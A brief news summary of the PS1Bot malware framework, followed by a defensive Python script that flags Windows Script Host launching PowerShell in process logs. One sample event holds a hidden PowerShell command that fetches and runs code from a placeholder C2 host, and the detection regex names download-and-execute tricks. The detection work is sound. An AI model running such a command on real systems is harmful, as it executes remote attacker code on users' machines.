Cybersecurity experts have identified a new malware framework called PS1Bot, which features a modular architecture allowing it to perform various malicious actions, including information theft, keylogging, reconnaissance, and establishing persistent access. PS1Bot employs stealth techniques, such as in-memory execution, to minimize its digital footprint and complicate forensic investigations.

Active since early 2025, it uses malvertising as a primary infection vector, delivering a compressed archive containing a JavaScript payload that downloads and executes a PowerShell script. This script connects to a command-and-control server to retrieve additional commands and can perform actions like antivirus detection, screen capture, data extraction from cryptocurrency wallets, and maintaining persistence on the infected system. The information stealer module is particularly concerning due to its ability to locate sensitive files related to cryptocurrency.

PS1Bot shares technical similarities with AHK Bot and is linked to previous ransomware campaigns using Skitnet. In response to these threats, Google has implemented advanced AI systems to combat invalid traffic, achieving a 40% reduction in deceptive ad practices.
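The infection chain described above (a JavaScript file from a downloaded archive launching PowerShell) leaves a parent/child process pattern that defenders can hunt for in process-creation logs. The following is an added example, not code from the original report: it assumes Sysmon-style fields (`Image`, `ParentImage`, `CommandLine`, `ParentCommandLine`), assumes the JavaScript runs under Windows Script Host, and uses constructed sample events with placeholder paths and hosts.

```python
import re

# Assumption: a .js file opened from an extracted archive runs under Windows
# Script Host, so the PowerShell stage appears as its child process.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Generic traits of PowerShell that fetches or decodes code and runs it in memory.
IN_MEMORY = re.compile(
    r"\b(iex|invoke-expression|downloadstring|invoke-webrequest|iwr|irm)\b"
    r"|\s-enc\w*\s|frombase64string", re.I)
# Directories where browser downloads and archive extractions usually land.
USER_WRITABLE = re.compile(r"\\(downloads|temp)\\", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Score one process-creation event; 0 means the chain is absent."""
    if not (basename(ev["ParentImage"]) in SCRIPT_HOSTS
            and basename(ev["Image"]) in POWERSHELL):
        return 0, []
    reasons = ["script host spawned PowerShell"]
    parent_cmd = ev["ParentCommandLine"].lower()
    if ".js" in parent_cmd and USER_WRITABLE.search(parent_cmd):
        reasons.append("JavaScript ran from a download or temp directory")
    if IN_MEMORY.search(ev["CommandLine"]):
        reasons.append("PowerShell fetches or decodes code on the command line")
    return len(reasons), reasons

def triage(events, threshold=2):
    """Return (event, reasons) pairs scoring at or above the threshold."""
    scored = ((ev, score_event(ev)) for ev in events)
    return [(ev, why) for ev, (score, why) in scored if score >= threshold]

# Constructed sample events (not from the page); hosts and paths are placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"ParentImage": r"C:\Windows\System32\wscript.exe", "Image": PS,
     "ParentCommandLine": r"wscript.exe C:\Users\alice\Downloads\manual\manual.js",
     "CommandLine": 'powershell.exe -w hidden -c "iex (irm http://c2.example.invalid/s)"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "ParentCommandLine": "explorer.exe",
     "Image": PS, "CommandLine": "powershell.exe"},
    {"ParentImage": r"C:\Windows\System32\cscript.exe", "Image": PS,
     "ParentCommandLine": r"cscript.exe //nologo C:\Scripts\inventory.js",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service"},
]
if __name__ == "__main__":
    for ev, why in triage(EVENTS): print(ev["ParentCommandLine"], "->", why)
```

The third constructed event shows why the rule scores rather than alerts on the parent/child pair alone: legitimate admin automation also launches PowerShell from a script host, so only events with additional traits cross the threshold.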